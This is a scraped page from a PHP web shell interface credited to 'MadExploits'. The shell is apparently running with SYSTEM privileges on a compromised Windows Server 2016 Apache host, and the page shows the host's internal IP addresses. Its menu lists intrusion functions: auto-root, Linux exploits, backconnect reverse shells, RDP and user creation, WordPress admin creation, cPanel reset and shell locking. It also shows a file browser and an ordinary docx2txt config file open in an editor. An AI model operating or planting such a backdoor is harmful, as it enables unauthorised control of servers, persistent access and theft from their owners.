Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
etc /
[ HOME SHELL ]
Name
Size
Permission
Action
pkcs11
[ DIR ]
drwxrwxrwx
pki
[ DIR ]
drwxrwxrwx
post-install
[ DIR ]
drwxrwxrwx
profile.d
[ DIR ]
drwxrwxrwx
ssh
[ DIR ]
drwxrwxrwx
DIR_COLORS
4.25
KB
-rw-rw-rw-
bash.bash_logout
623
B
-rw-rw-rw-
bash.bashrc
2.44
KB
-rw-rw-rw-
docx2txt.config
1.7
KB
-rw-rw-rw-
fstab
272
B
-rw-rw-rw-
gitattributes
515
B
-rw-rw-rw-
gitconfig
389
B
-rw-rw-rw-
inputrc
2.52
KB
-rw-rw-rw-
msystem
3.09
KB
-rw-rw-rw-
nanorc
10.94
KB
-rw-rw-rw-
nsswitch.conf
211
B
-rw-rw-rw-
package-versions.txt
3.75
KB
-rw-rw-rw-
profile
6.21
KB
-rw-rw-rw-
tigrc
18.74
KB
-rw-rw-rw-
vimrc
2.84
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docx2txt.config
# # User controllable configuration parameters for docx2txt.pl # # Note: # - Ensure that all configuration lines end with single comma (,). # - Lines beginning with '#' are comments. # # # Specify the path to "unzip" command. # # Windows users should specify this path like # # 'C:\Cygwin\bin\unzip.exe' (With Windows native perl.exe) # Or # 'C:/Cygwin/bin/unzip.exe' (With Cygwin/Windows native perl.exe) # # Default : '/usr/bin/unzip' # config_unzip => '/usr/bin/unzip', # # Specify the commandline option(s) to be supplied to the program specified in # config_unzip, that allow silent extraction of specified file from zip archive # to console/standard output/pipe. # # Default : '-p' (for unzip) # # config_unzip_opts => '-p', # # How the newline should be in output text file - "\n" or "\r\n". # # Default : "\n" # # config_newLine => "\n", # # Line width to use for short line (single line paragraph) justifiction. # # Default : 80 # # config_lineWidth => 80, # # Show hyperlink alongside linked text - [yY/nN] # # Note: Even if this option is enabled, hyperlinks will be shown only if # hyperlink differs from the linked text. # # Default : N # config_showHyperLink => "Y", # # Directory for creation of temporary file. # # In case input is provided via STDIN (standard input), it is first stored in a # temporary file and then further processing is done using that file. # Same path specification rules apply here as in case of config_unzip. # # Default : "/tmp" (Non-Windows OSes), Environment variable "TEMP" (Windows) # # config_tempDir => "/path/to/your/temp/directory", # # Approximate mapping of twips to character for layout purpose. # # Default : 120 # config_twipsPerChar => 240,
Close